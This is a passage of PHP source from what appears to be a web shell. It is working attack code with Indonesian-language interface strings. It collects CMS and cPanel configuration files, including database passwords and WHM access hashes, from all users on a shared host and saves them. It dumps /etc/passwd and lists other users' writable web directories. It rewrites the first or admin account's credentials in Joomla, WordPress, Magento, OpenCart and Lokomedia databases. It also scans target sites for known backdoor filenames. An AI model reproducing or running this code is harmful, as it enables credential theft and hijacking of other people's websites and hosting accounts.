  1076.                     "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  1077.                     "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  1078.                     "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  1079.                     "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  1080.                     "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  1081.                     "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  1082.                     "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  1083.                     "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  1084.                     "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  1085.                     "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
  1086.                     "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  1087.                     "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  1088.                     "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  1089.                     "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  1090.                     "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  1091.                     "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  1092.                     "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  1093.                     "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1094.                     "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1095.                     "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1096.                     "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1097.                     "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1098.                     "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1099.                     "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1100.                     "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1101.                     "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1102.                     "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1103.                     "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1104.                     "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1105.                     "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1106.                     "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1107.                     "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1108.                     "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1109.                     "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1110.                     "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1111.                     "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1112.                     "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1113.                     "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1114.                     "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1115.                     "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1116.                     "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1117.                     "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1118.                     "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1119.                     "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1120.                     "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1121.                     "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  1122.                     "/home3/$user_cox/.my.cnf" => "cpanel",
  1123.                     "/home3/$user_cox/.accesshash" => "WHM-accesshash",
  1124.                     "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  1125.                     "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1126.                     "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1127.                     "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  1128.                     "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  1129.                     "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
  1130.                     "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1131.                     "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  1132.                     "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1133.                     "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
  1134.                     "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
  1135.                     "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  1136.                     "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  1137.                     "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  1138.                     "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
  1139.                     "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  1140.                     "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  1141.                     "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  1142.                     "/home3/$user_cox/public_html/configuration.php" => "Joomla",                  
  1143.                     "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  1144.                     "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  1145.                     "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  1146.                     "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  1147.                     "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  1148.                     "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  1149.                     "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  1150.                     "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  1151.                     "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  1152.                     "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  1153.                     "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  1154.                     "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  1155.                     "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  1156.                     "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  1157.                     "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  1158.                     "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  1159.                     "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  1160.                     "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  1161.                     "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  1162.                     "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  1163.                     "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  1164.                     "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  1165.                     "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  1166.                     "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  1167.                     "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  1168.                     "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  1169.                     "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  1170.                     "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  1171.                     "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  1172.                     "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  1173.                     "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  1174.                     "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  1175.                     "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  1176.                     "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  1177.                     "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  1178.                     "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  1179.                     "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
  1180.                     "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  1181.                     "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  1182.                     "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  1183.                     "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  1184.                     "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  1185.                     "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  1186.                     "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  1187.                     "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1188.                     "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1189.                     "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1190.                     "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1191.                     "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1192.                     "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1193.                     "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1194.                     "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1195.                     "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1196.                     "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1197.                     "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1198.                     "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1199.                     "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1200.                     "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1201.                     "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1202.                     "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1203.                     "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1204.                     "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1205.                     "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1206.                     "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1207.                     "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1208.                     "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1209.                     "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1210.                     "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1211.                     "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1212.                     "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1213.                     "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1214.                     "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1215.                     "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"                   
  1216.                         ); 
  1217.                     foreach($grab_config as $config => $nama_config) {
  1218.                         $ambil_config = file_get_contents($config);
  1219.                         if($ambil_config == '') {
  1220.                         } else {
  1221.                             $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
  1222.                             fputs($file_config,$ambil_config);
  1223.                         }
  1224.                     }
  1225.                 }      
  1226.             }
  1227.             echo "<center><a href='?dir=$dir/cox_config'><font color=lime>Done</font></a></center>";
  1228.             }else{
  1229.                
  1230.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1231.         echo file_get_contents('/etc/passwd');
  1232.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1233.         }
  1234. } elseif($_GET['do'] == 'jumping') {
  1235.     $i = 0;
  1236.     echo "<pre><div class='margin: 5px auto;'>";
  1237.     $etc = fopen("/etc/passwd", "r");
  1238.     while($passwd = fgets($etc)) {
  1239.         if($passwd == '' || !$etc) {
  1240.             echo "<font color=red>Can't read /etc/passwd</font>";
  1241.         } else {
  1242.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1243.             foreach($user_jumping[1] as $user_idx_jump) {
  1244.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1245.                 if(is_readable($user_jumping_dir)) {
  1246.                     $i++;
  1247.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1248.                     if(is_writable($user_jumping_dir)) {
  1249.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1250.                     }
  1251.                     echo $jrw;
  1252.                     $domain_jump = file_get_contents("/etc/named.conf");   
  1253.                     if($domain_jump == '') {
  1254.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1255.                     } else {
  1256.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1257.                         foreach($domains_jump[1] as $dj) {
  1258.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1259.                             $user_jumping_url = $user_jumping_url['name'];
  1260.                             if($user_jumping_url == $user_idx_jump) {
  1261.                                 echo " => ( <u>$dj</u> )<br>";
  1262.                                 break;
  1263.                             }
  1264.                         }
  1265.                     }
  1266.                 }
  1267.             }
  1268.         }
  1269.     }
  1270.     if($i == 0) {
  1271.     } else {
  1272.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1273.     }
  1274.     echo "</div></pre>";
  1275. } elseif($_GET['do'] == 'auto_edit_user') {
  1276.     if($_POST['hajar']) {
  1277.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1278.             echo "username atau password harus lebih dari 6 karakter";
  1279.         } else {
  1280.             $user_baru = $_POST['user_baru'];
  1281.             $pass_baru = md5($_POST['pass_baru']);
  1282.             $conf = $_POST['config_dir'];
  1283.             $scan_conf = scandir($conf);
  1284.             foreach($scan_conf as $file_conf) {
  1285.                 if(!is_file("$conf/$file_conf")) continue;
  1286.                 $config = file_get_contents("$conf/$file_conf");
  1287.                 if(preg_match("/JConfig|joomla/",$config)) {
  1288.                     $dbhost = ambilWord($config,"host = '","'");
  1289.                     $dbuser = ambilWord($config,"user = '","'");
  1290.                     $dbpass = ambilWord($config,"password = '","'");
  1291.                     $dbname = ambilWord($config,"db = '","'");
  1292.                     $dbprefix = ambilWord($config,"dbprefix = '","'");
  1293.                     $prefix = $dbprefix."users";
  1294.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1295.                     $db = mysql_select_db($dbname);
  1296.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1297.                     $result = mysql_fetch_array($q);
  1298.                     $id = $result['id'];
  1299.                     $site = ambilWord($config,"sitename = '","'");
  1300.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1301.                     echo "Config => ".$file_conf."<br>";
  1302.                     echo "CMS => Joomla<br>";
  1303.                     if($site == '') {
  1304.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1305.                     } else {
  1306.                         echo "Sitename => $site<br>";
  1307.                     }
  1308.                     if(!$update OR !$conn OR !$db) {
  1309.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1310.                     } else {
  1311.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1312.                     }
  1313.                     mysql_close($conn);
  1314.                 } elseif(preg_match("/WordPress/",$config)) {
  1315.                     $dbhost = ambilWord($config,"DB_HOST', '","'");
  1316.                     $dbuser = ambilWord($config,"DB_USER', '","'");
  1317.                     $dbpass = ambilWord($config,"DB_PASSWORD', '","'");
  1318.                     $dbname = ambilWord($config,"DB_NAME', '","'");
  1319.                     $dbprefix = ambilWord($config,"table_prefix  = '","'");
  1320.                     $prefix = $dbprefix."users";
  1321.                     $option = $dbprefix."options";
  1322.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1323.                     $db = mysql_select_db($dbname);
  1324.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1325.                     $result = mysql_fetch_array($q);
  1326.                     $id = $result[ID];
  1327.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1328.                     $result2 = mysql_fetch_array($q2);
  1329.                     $target = $result2[option_value];
  1330.                     if($target == '') {
  1331.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1332.                     } else {
  1333.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1334.                     }
  1335.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1336.                     echo "Config => ".$file_conf."<br>";
  1337.                     echo "CMS => Wordpress<br>";
  1338.                     echo $url_target;
  1339.                     if(!$update OR !$conn OR !$db) {
  1340.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1341.                     } else {
  1342.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1343.                     }
  1344.                     mysql_close($conn);
  1345.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1346.                     $dbhost = ambilWord($config,"<host><![CDATA[","]]></host>");
  1347.                     $dbuser = ambilWord($config,"<username><![CDATA[","]]></username>");
  1348.                     $dbpass = ambilWord($config,"<password><![CDATA[","]]></password>");
  1349.                     $dbname = ambilWord($config,"<dbname><![CDATA[","]]></dbname>");
  1350.                     $dbprefix = ambilWord($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1351.                     $prefix = $dbprefix."admin_user";
  1352.                     $option = $dbprefix."core_config_data";
  1353.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1354.                     $db = mysql_select_db($dbname);
  1355.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1356.                     $result = mysql_fetch_array($q);
  1357.                     $id = $result[user_id];
  1358.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1359.                     $result2 = mysql_fetch_array($q2);
  1360.                     $target = $result2[value];
  1361.                     if($target == '') {
  1362.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1363.                     } else {
  1364.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1365.                     }
  1366.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1367.                     echo "Config => ".$file_conf."<br>";
  1368.                     echo "CMS => Magento<br>";
  1369.                     echo $url_target;
  1370.                     if(!$update OR !$conn OR !$db) {
  1371.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1372.                     } else {
  1373.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1374.                     }
  1375.                     mysql_close($conn);
  1376.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1377.                     $dbhost = ambilWord($config,"'DB_HOSTNAME', '","'");
  1378.                     $dbuser = ambilWord($config,"'DB_USERNAME', '","'");
  1379.                     $dbpass = ambilWord($config,"'DB_PASSWORD', '","'");
  1380.                     $dbname = ambilWord($config,"'DB_DATABASE', '","'");
  1381.                     $dbprefix = ambilWord($config,"'DB_PREFIX', '","'");
  1382.                     $prefix = $dbprefix."user";
  1383.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1384.                     $db = mysql_select_db($dbname);
  1385.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1386.                     $result = mysql_fetch_array($q);
  1387.                     $id = $result[user_id];
  1388.                     $target = ambilWord($config,"HTTP_SERVER', '","'");
  1389.                     if($target == '') {
  1390.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1391.                     } else {
  1392.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1393.                     }
  1394.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1395.                     echo "Config => ".$file_conf."<br>";
  1396.                     echo "CMS => OpenCart<br>";
  1397.                     echo $url_target;
  1398.                     if(!$update OR !$conn OR !$db) {
  1399.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1400.                     } else {
  1401.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1402.                     }
  1403.                     mysql_close($conn);
  1404.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1405.                     $dbhost = ambilWord($config,'server = "','"');
  1406.                     $dbuser = ambilWord($config,'username = "','"');
  1407.                     $dbpass = ambilWord($config,'password = "','"');
  1408.                     $dbname = ambilWord($config,'database = "','"');
  1409.                     $prefix = "users";
  1410.                     $option = "identitas";
  1411.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1412.                     $db = mysql_select_db($dbname);
  1413.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1414.                     $result = mysql_fetch_array($q);
  1415.                     $target = $result[alamat_website];
  1416.                     if($target == '') {
  1417.                         $target2 = $result[url];
  1418.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1419.                         if($target2 == '') {
  1420.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1421.                         } else {
  1422.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1423.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1424.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1425.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1426.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1427.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1428.                             } else {
  1429.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1430.                             }
  1431.                         }
  1432.                     } else {
  1433.                         $cek_login = file_get_contents("$target/adminweb/");
  1434.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1435.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1436.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1437.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1438.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1439.                         } else {
  1440.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1441.                         }
  1442.                     }
  1443.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1444.                     echo "Config => ".$file_conf."<br>";
  1445.                     echo "CMS => Lokomedia<br>";
  1446.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1447.                         echo $url_target2;
  1448.                     } else {
  1449.                         echo $url_target;
  1450.                     }
  1451.                     if(!$update OR !$conn OR !$db) {
  1452.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1453.                     } else {
  1454.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1455.                     }
  1456.                     mysql_close($conn);
  1457.                 }
  1458.             }
  1459.         }
  1460.     } else {
  1461.         echo "<center>
  1462.         <h1>Auto Edit User Config</h1>
  1463.         <form method='post'>
  1464.         DIR Config: <br>
  1465.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1466.         Set User & Pass: <br>
  1467.         <input type='text' name='user_baru' value='--00--' placeholder='user_baru'><br>
  1468.         <input type='text' name='pass_baru' value='--00--' placeholder='pass_baru'><br>
  1469.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1470.         </form>
  1471.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1472.         ";
  1473.     }
  1474. }elseif($_GET['do'] == 'shelscan') {
  1475.     echo'<center><h2>Shell Finder</h2>
  1476. <form action="" method="post">
  1477. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  1478. <br>
  1479. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  1480. </form><br>';
  1481. if (isset($_POST["scan"])) {  
  1482. $url = $_POST['traget'];
  1483. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  1484. echo "Result :<br />";
  1485. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  1486. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  1487. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  1488. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  1489. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  1490. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  1491. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  1492. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  1493. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  1494. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  1495. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  1496. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  1497. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  1498. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  1499. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  1500. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  1501. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  1502. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  1503. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  1504. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  1505. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  1506. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  1507. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  1508. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  1509. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  1510. foreach ($shells as $shell){
  1511. $headers = get_headers("$url$shell"); //
  1512. if (eregi('200', $headers[0])) {
  1513. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  1514. $dz = fopen('shells.txt', 'a+');
  1515. $suck = "$url$shell";
  1516. fwrite($dz, $suck."\n");
  1517. }
  1518. }
  1519. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
